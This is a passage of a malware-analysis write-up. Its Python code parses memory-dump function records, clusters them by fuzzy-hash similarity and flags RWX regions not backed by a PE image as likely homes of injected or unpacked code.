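        base, protect = parse_sdmp_name(src["name"])
        rec = FunctionRecord(iid[1], fuzzy[1], base, int(src["off"], 16),
                             protect, src["pe"] == "true")
        # Internal consistency check: stated Offset must equal the dump base.
        if rec.base != rec.offset:
            raise ValueError(f"base/offset mismatch in {src['name']}")
        records.append(rec)
    return records


def nibble_distance(a: str, b: str) -> int:
    """Number of differing hex positions (ASSUMED metric; the page states
    no similarity measure for these hashes)."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length")
    return sum(x != y for x, y in zip(a, b))


def cluster(records, max_distance=8):
    """Single-linkage clustering via union-find: any two records within
    max_distance end up in the same group.  Largest group first."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, j in combinations(range(len(records)), 2):
        if nibble_distance(records[i].fuzzy_hash,
                           records[j].fuzzy_hash) <= max_distance:
            parent[find(i)] = find(j)
    groups = {}
    for i, rec in enumerate(records):
        groups.setdefault(find(i), []).append(rec)
    return sorted(groups.values(), key=len, reverse=True)


def rwx_unbacked_regions(records) -> set[int]:
    """Bases of RWX regions not backed by a PE image: the usual home of
    unpacked or injected code, and the regions worth carving for a payload."""
    return {r.base for r in records
            if r.protect == PAGE_EXECUTE_READWRITE and not r.pe_backed}


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for group in cluster(recs):
        print(f"{len(group)} function(s) in region 0x{group[0].base:08X}:")
        for r in group:
            print(f"  {r.instruction_id[:16]}  {r.fuzzy_hash}")
    print("RWX non-PE regions:", sorted(hex(b) for b in rwx_unbacked_regions(recs)))
```

On the five sample records the three 06A60000 functions land in one group (pairwise 3 to 4 differing positions out of 70) while the 06A70000 and 02F60000 functions each stand alone (20 or more differences from the group), which is the pattern visible by eye across the full list above: one region of many near-identical functions, typical of generated or obfuscator-emitted code. To run it over the real report, feed the text of this section to `parse_records`; the parser skips any record that lacks one of the three fields instead of guessing, and raises if a record's Offset disagrees with its .sdmp base.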